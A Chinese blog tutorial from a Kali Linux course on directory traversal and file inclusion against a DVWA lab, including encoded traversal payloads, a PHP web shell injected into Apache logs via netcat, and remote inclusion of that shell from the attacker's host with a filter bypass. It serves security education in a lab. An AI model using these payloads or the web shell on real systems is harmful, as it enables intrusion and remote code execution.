Kali Linux渗透测试 087 手动漏洞挖掘-目录遍历、文件包含漏洞

最新推荐文章于 2022-04-07 11:45:54 发布
最新推荐文章于 2022-04-07 11:45:54 发布
阅读量2.2k 收藏 3
点赞数 2
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kevinhanser/article/details/79654218
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 目录遍历和文件包含
    1-1. 两种漏洞放在一起进行测试
    1-2. 设置 dvwa 可以进行远程文件包含测试
    1-3. 漏洞特征
    1-4. 经典测试方法
    1-5. 绕过字符过滤
    1-6. cookie 注入目录遍历
    1-7. 本地文件包含
    1-8. 远程文件包含
2. 漏洞利用
3. 权限配置不当引起的本地文件包含漏洞
4. 远程文件包含漏洞
    4-1. dvwa测试 Low 级别下的源代码
    4-2. dvwa测试 Medium 级别下的源代码
    4-3. dvwa测试 High 级别下的源代码
    4-4. 远程文件包含漏洞的危害
5. kali 自带攻击向量的字典文件

1. 目录遍历和文件包含

1. 两种漏洞放在一起进行测试

kali linux 2018.1 : 10.10.10.131
dvwa:10.10.10.132
原理一样,放在一起进行测试

2. 设置 dvwa 可以进行远程文件包含测试

root@metasploitable:~# vim /etc/php5/cgi/php.ini       
    ; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
    allow_url_include = On
root@metasploitable:~# /etc/init.d/apache2 restart

3. 漏洞特征

  • 应用程序操作文件,限制不严时导致访问Web目录以外的文件,包括读写文件和远程执行代码

  • 特征但不绝对:

     ?page=a.php
 ?home=b.html
 ?file=content

4. 经典测试方法

5. 绕过字符过滤

  • “.” “%00” #绕过文件扩展名过滤

    • ?file=a.doc%00.php

  • 使用多种编码尝试

  • url 编码或者进行双层甚至三层 url 编码

    • %2e%2e%2f 解码 ../
    • %2e%2e%5c 解码 ..\
    • %252e%252e%255c 解码 ..\

  • Unicode/UTF-8 解码

    • ..%c0%af ?????? ../
    • ..%u2216
    • ..%c1%9c ?????? ..\

  • 其他系统路径可能使用的字符

    • file.txt…
    • file.txt
    • file.txt””””
    • file.txt<<<>>><
    • ./././file.txt
    • nonexistant/../file.txt

  • UNC路径

    • \1.1.1.1\path\to\file.txt

  • 代码

  • 攻击

  • 结果

6. 本地文件包含

  • 查看文件

  • 代码执行

7. 远程文件包含

  • 远程文件包含

    • 出现概率少于本地文件包含,但是更容易被利用

  • /usr/share/wfuzz/wordlist/vulns/

2. 漏洞利用

  1. 默认的文件包含漏洞的 URL 地址:

    http://10.10.10.132/dvwa/vulnerabilities/fi/?page=include.php

  2. 可以使用 “?page=../../../../../../../etc/passwd”

    http://10.10.10.132/dvwa/vulnerabilities/fi/?page=../../../../../../../etc/passwd

  3. 文件包含漏洞可以使用绝对路径“?page=/etc/passwd”

    http://10.10.10.132/dvwa/vulnerabilities/fi/?page=/etc/passwd

  4. 使用系统文件路径“?page=file:///etc/passwd”

    http://10.10.10.132/dvwa/vulnerabilities/fi/?page=file:///etc/passwd

  5. 远程目录遍历 “?page=http://www.sina.com

    http://10.10.10.132/dvwa/vulnerabilities/fi/?page=http://www.sina.com

  6. 可以使用反弹 shell 的方式 “page=http://www.a.com/1.php

  7. 绕过字符过滤 “?page=file:///etc/passwd%00”

    http://10.10.10.132/dvwa/vulnerabilities/fi/?page=file:///etc/passwd%00

  8. 绕过字符过滤 “%2e%2e%2f” 代替“../”

    10.10.10.132/dvwa/vulnerabilities/fi/?page=..%2f..%2f..%2f..%2f..%2fetc/passwdaa


3. 权限配置不当引起的本地文件包含漏洞

  1. 修改 dvwa 的 access.log 权限,使其错误配置系统权限

    root@metasploitable:/var/log/apache2# chmod a+rx access.log
root@metasploitable:/var/log# chmod a+rx apache2
root@metasploitable:/var# chmod a+rx log
root@metasploitable:/# chmod a+rx var

  2. 使用 nc 插入代码

    root@kali:~/Desktop# nc -nv 10.10.10.132 80
(UNKNOWN) [10.10.10.132] 80 (http) open
<?php echo shell_exec($_GET['cmd']);?>

  3. 浏览器测试

    http://10.10.10.132/dvwa/vulnerabilities/fi/?page=/var/log/apache2/access.log


    http://10.10.10.132/dvwa/vulnerabilities/fi/?cmd=id&page=/var/log/apache2/access.log


    http://10.10.10.132/dvwa/vulnerabilities/fi/?cmd=pwd&page=/var/log/apache2/access.log


    hp index.php 


    http://10.10.10.132/dvwa/vulnerabilities/fi/?page=/var/log/apache2/access.log&cmd=id

4. 远程文件包含漏洞

1. dvwa测试 Low 级别下的源代码

  1. kali 本机监听 80 端口

    root@kali:~# nc -nvlp 80
listening on [any] 80 ...

  2. kali 浏览器 随便指定一个URL,IP地址为kali 本机

    10.10.10.132/dvwa/vulnerabilities/fi/?page=http://10.10.10.131/a.php

  3. nc 接收到请求

    connect to [10.10.10.131] from (UNKNOWN) [10.10.10.132] 36129
GET /a.php HTTP/1.0
Host: 10.10.10.131

  4. 查看 dvwa Low 级别下的源代码

    <?php
    $file = $_GET['page']; //The page we wish to display 
?>

2. dvwa测试 Medium 级别下的源代码

  1. kali 本机监听 80 端口

    root@kali:~# nc -nvlp 80
listening on [any] 80 ...

  2. kali 浏览器 随便指定一个URL,IP地址为kali 本机

    10.10.10.132/dvwa/vulnerabilities/fi/?page=http://10.10.10.131/a.php

  3. nc 接收到请求

    未接收到请求

  4. 查看 dvwa Medium 级别下的源代码,发现被过滤

     <?php
    $file = $_GET['page']; // The page we wish to display 
    // Bad input validation
    $file = str_replace("http://", "", $file);
    $file = str_replace("https://", "", $file);        
?>

  5. 编码中是将 http:// 过滤为空字符(即删除)

    可以利用此机制,使用两次 http:// ,将第二次插入到 http:// 中间
将 http:// 换位 htthttp://p://

  6. kaili.org快来领取随便指定 URL,IP地址为kali 本机

    http://10.10.10.132/dvwa/vulnerabilities/fi/?page=hthttp://tp://10.10.10.131/

  7. nc 接收到请求

    root@kali:~# nc -nvlp 80
listening on [any] 80 ...
connect to [10.10.10.131] from (UNKNOWN) [10.10.10.132] 55014
GET / HTTP/1.0
Host: 10.10.10.131

3. dvwa测试 High 级别下的源代码

  1. 正确的代码 URL为

    10.10.10.132/dvwa/vulnerabilities/fi/?page=include.php

  2. 查看 dvwa High 级别下的源代码

     <?php   
    $file = $_GET['page']; //The page we wish to display 
    // Only allow include.php
    if ( $file != "include.php" ) {
        echo "ERROR: File not found!";
        exit;
    }  
?>

4. 远程文件包含漏洞的危害

  • 在 kali 创建 文件,dvwa 在 Medium情况下

    root@kali:/var/www/html# cat test.txt 
<?php echo shell_exec($_GET['cmd']);?>

  • kali 启动 apache2

    root@kali:/var/www/html# systemctl start apache2.service

  • kali 浏览器

    10.10.10.132/dvwa/vulnerabilities/fi/?page=htthttp://p://10.10.10.131/test.txt&cmd=pwd

  • kali 浏览器

    http://10.10.10.132/dvwa/vulnerabilities/fi/?page=htthttp://p://10.10.10.131/test.txt&cmd=id

5. kali 自带攻击向量的字典文件

位置:

/usr/share/wfuzz/wordlist/
/usr/share/wfuzz/wordlist/vulns/


网络安全打工人
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
路径遍历与文件读取漏洞以及其修复方案
pygain的博客
10-17 3万+
一些网站的业务需求,可能提供文件查看或下载功能,如果对用户查看或下载的文件不做限制,那么用户就能够查看和下载任意2文件,可以使源代码文件、敏感文件等
Linux操作系统相关习题集
04-25
Linux操作系统相关习题集,包含常用名、Linux系统基础知识等
目录遍历攻击详解
metheir的博客
01-08 8240
对于一个安全的Web服务器来说,对Web内容进行恰当的访问控制是极为关键的。目录遍历是Http所存在的一个安全漏洞,它使得攻击者能够访问受限制的目录,并在Web服务器的根目录以外执行命令。   Web服务器主要提供两个级别的安全机制:   访问控制列表——就是我们常说的ACL   根目录访问   访问控制列表是用于授权过程的,它是一个Web服务器的管理员用来说明什么用户或用
DVWA--登录页面错误问题“解决办法”
sinat_26474359的博客
11-15 1万+
Fatal error: Uncaught exception 'PDOException' with message ' in D:\DVWA\wamp\www\DVWA-1.9\dvwa\includes\dvwaPage.inc.php on line 469 PDOException: in D:\DVWA\wamp\www\DVWA-1.9\dvwa\includes\dvwaPa
DVWA在Kali中的安装步骤及过程中遇到的问题解决方案-02
一杯咖啡的渗透记忆
03-19 1747
17. open localhost on firefox127.0.0.1/127.0.0.1/dvwa/setup.phpSo now I see both apache2 andMySQL are started:Localhost shows Apache default page:But 127.0.0.1/dvwa/setup.phpalways shows” the connecti...
目录遍历攻击
热门推荐
大菜鸟的博客
02-11 2万+
原文地址:https://en.wikipedia.org/wiki/Directory_traversal_attack【译】目录遍历攻击一次目录遍历攻击(directory traversal attack)通常利用了“服务器安全认证缺失”或者“用户提供输入的文件处理操作”,使得服务器端文件操作接口执行了带有“遍历父文件目录”意图的恶意输入字符。 这种攻击的目的通常是利用服务器相关(存在安全漏
java 目录遍历漏洞_CVE-2006-5750 JBoss Java Class DeploymentFileRepository目录遍历漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安...
weixin_42511270的博客
02-26 399
|参考资料来源:BID名称:21219链接:http://www.securityfocus.com/bid/21219来源:REDHAT名称:RHSA-2006:0743链接:http://www.redhat.com/support/errata/RHSA-2006-0743.html来源:VUPEN名称:ADV-2006-4724链接:http://www.frsirt.com/englis...
目录遍历漏洞
xsyu_liuyan的博客
03-16 1万+
一. 什么是目录遍历漏洞 目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。 二. 目录遍历漏洞原理 程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上
从0到1完全掌握目录遍历漏洞
hackzkaq的博客
04-07 280
零基础学黑客,搜索公众号:白帽子左一 什么是目录遍历漏洞 目录遍历漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露。 比如数据库备份文件、配置文件等,攻击者利用该信息可以为进一步入侵网站做准备。 简单来说,我个人认为目录遍历更像是一种 trick,是一种可以配合其他攻击一起使用的 trick,利用方法高于 CSRF 与 CORS。 早在最早接触的 dirb、御剑、Burpsuite 中的目录爆破工具,如果能扫出一些存在/存活的目录,其实就是目录遍历漏洞的一种。 总
kali-linux-2021.3-installer-amd64.part4.rar
09-29
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
基于java的-30-「计算机毕业设计」基于net的湖南特产销售网站-源码.zip
04-25
提供的源码资源涵盖了Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 适合毕业设计、课程设计作业。这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。 所有源码均经过严格测试,可以直接运行,可以放心下载使用。有任何使用问题欢迎随时与博主沟通,第一时间进行解答!
JVM+Java程序运行过程内存分配图解
04-25
1、JVM 内存分配图解的 Visio 工程图。 2、直接下载使用、可自行调整和修改
IOC智慧运营中心平台整体解决方案qy.pptx
04-25
IOC智慧运营中心平台整体解决方案qy.pptx
node-v12.22.8-x86.msi
最新发布
04-25
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
【前端素材】大数据-电动车管理.zip
04-25
大数据技术指的是用于处理和分析大规模数据集的技术和工具。以下是一些常见的大数据技术和工具: Hadoop:Apache Hadoop是一个用于分布式存储和处理大规模数据的开源框架。它包括Hadoop Distributed File System(HDFS)用于数据存储和MapReduce用于数据处理。 Spark:Apache Spark是一个快速、通用的集群计算系统,提供了比MapReduce更快的数据处理能力。它支持内存计算和更多复杂的数据处理流程。 NoSQL数据库:NoSQL数据库(如MongoDB、Cassandra等)则更适用于处理这类数据。 数据仓库:数据仓库是一个用于集成和分析大规模数据的存储系统,一些知名的数据仓库包括Snowflake、Amazon Redshift等。 数据湖:数据湖是一个存储结构化和非结构化数据的存储池,用于支持数据分析和机器学习应用。 机器学习:大数据技术也广泛应用于机器学习领域,支持大规模数据的模型训练和预测分析。 流式处理:针对实时数据处理需求,流式处理技术(如Apache Kafka、Apache Flink)可以实时。
kali linux渗透测试靶机
02-23
Kali Linux是一种专门用于渗透测试和网络安全的操作系统。它集成了大量的渗透测试工具和资源,使得安全专业人员能够有效地评估和保护网络系统的安全性。 Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux渗透测试靶机: 1. Metasploitable:Metasploitable是一个故意构建的易受攻击的虚拟机,它包含了多个漏洞和弱点,可以用于学习和实践Metasploit框架的使用。 2. DVWA(Damn Vulnerable Web Application):DVWA是一个故意构建的Web应用程序,包含了多个常见的Web漏洞,如SQL注入、XSS等,可以用于学习和实践Web应用程序渗透测试技术。 3. OWASP Mutillidae II:Mutillidae II是一个故意构建的Web应用程序,旨在模拟真实世界中的各种Web漏洞和攻击场景,包括SQL注入、文件包含等。 4. Hack The Box:Hack The Box是一个在线平台,提供了一系列的渗透测试靶机,每个靶机都有不同的漏洞和挑战,可以用于测试和提高渗透测试技能。 这些渗透测试靶机都可以在Kali Linux上进行安装和使用。通过实践和探索这些靶机,安全专业人员可以提高他们的渗透测试技能,并了解如何保护网络系统免受各种攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值